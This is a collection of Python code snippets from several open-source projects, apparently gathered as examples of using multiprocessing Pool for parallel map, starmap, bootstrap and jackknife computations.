    input_dir, output_dir = getDirs()
    table_list = listFiles(input_dir)

    concurrency = cpu_count()
    print 'Using {0:d} Processes'.format(concurrency)
    pool = Pool(concurrency)

    # perform the passed in write action (function) for each csv row
    time_capture = TimeCapture(time.time())
    results = pool.map(
        multiprocess,
        izip(repeat(output_dir),
            [copy.deepcopy(time_capture) for i in range(len(table_list))],
            table_list,
            repeat(write)))
    time_capture.end(1)

    pool.close()
    pool.join()

    print 'Finished Successfully!'
    displayResults(results, time_capture.total_time)
Project: HSISeg    Author: HSISeg
def get_dissimilarity_matrix(U,V,X,n,error_list,beta,alpha_w,alpha_e_avg_t,alpha_n0,maxconn):
    row_size = X.shape[0]
    col_size = X.shape[1]
    channel_count = X.shape[2]
    alpha = get_alpha(n,error_list,alpha_w,alpha_e_avg_t,alpha_n0)
    cluster_number = V.shape[0]
    D = np.zeros((row_size,col_size,cluster_number)) 
    index_arr = np.array([[k,l] for k in xrange(row_size) for l in xrange(col_size)],dtype='int32')
    U_new = U.reshape(row_size*col_size,cluster_number, order='F')
    data_inputs = [0 for i in xrange(0,row_size*col_size)]
    for i in xrange(0, row_size*col_size):
        x = index_arr[i][0]
        y = index_arr[i][1]
        data_inputs[i] = [U_new,V,X[x][y],x,y,alpha,beta[x*row_size+y,:]]
    pool = Pool(maxconn) 
    outputs = pool.map(compute_cluster_distances_pool, data_inputs)
    pool.close()
    pool.join()
    for i in xrange(0,row_size*col_size):
        x = index_arr[i][0]
        y = index_arr[i][1]
        D[x][y] = outputs[i]
    return D
Project: kaggle-seizure-prediction    Author: sics-lm
def load_files_parallel(feature_files, load_function, processes, **kwargs):
    """
    Function for loading feature files in parallel.
    :param feature_files: The collection of files to load.
    :param load_function: The function used to load the objects.
    :param processes: The number of processes to use for loading the feature files.
    :param kwargs: Keyword arguments which will be sent to the load function.
    :return: A list of loaded feature data frames or numpy arrays.
    """
    logging.info("Reading files in parallel")
    pool = multiprocessing.Pool(processes)
    try:
        #Create a partial function with the keyword arguments set. This is done since the parallel map from
        # multiprocessing expects a function which takes a single argument.
        partial_load_and_pivot = partial(load_function, **kwargs)
        segment_frames = pool.map(partial_load_and_pivot, feature_files)
    finally:
        pool.close()
    return segment_frames
Project: Parallel-Processing-Nadig    Author: madhug-nadig
def parallel_jaccard_similarity(self,x,y):

        p = 16
        pool = mp.Pool(processes= p)

        chunk_X = []
        chunk_Y = []

        for i in range(0, len(x), p):

            chunk_X.append(x[int(i):int((i+1)*p)])
            chunk_Y.append(y[int(i):int((i+1)*p)])

        s = time.clock()

        intersection_cardinality = sum(pool.starmap(self.interc_card_locl, zip(chunk_X,chunk_Y)))
        union_cardinality = sum(pool.starmap(self.union_card_locl, zip(chunk_X,chunk_Y)))
        print(intersection_cardinality, union_cardinality)
        e = time.clock()
        print("Parallel Jaccard Exec Time: ", e-s)
        return intersection_cardinality/float(union_cardinality)
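pool.starmap (Python 3.3+) unpacks each argument tuple before calling the worker, which is how the chunk pairs above are dispatched; a minimal sketch:

import multiprocessing

def intersection_size(xs, ys):
    # starmap passes each (xs, ys) pair as two separate arguments.
    return len(set(xs) & set(ys))

if __name__ == '__main__':
    pairs = [([1, 2, 3], [2, 3, 4]), ([5, 6], [6, 7])]
    with multiprocessing.Pool(2) as pool:
        print(sum(pool.starmap(intersection_size, pairs)))  # 2 + 1 = 3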
Project: pylspm    Author: lseman
def boot(self):
        p = Pool(self.cores)
        result = p.map(self.do_work, range(self.br))
        p.close()
        p.join()
        return result
Project: pylspm    Author: lseman
def jk(self):
        p = Pool(self.cores)

        base = np.arange(0, len(self.data))
        self.indices = list(np.delete(base, i) for i in base)

        result = p.map(self.do_work_jk, range(self.br))
        p.close()
        p.join()
        return result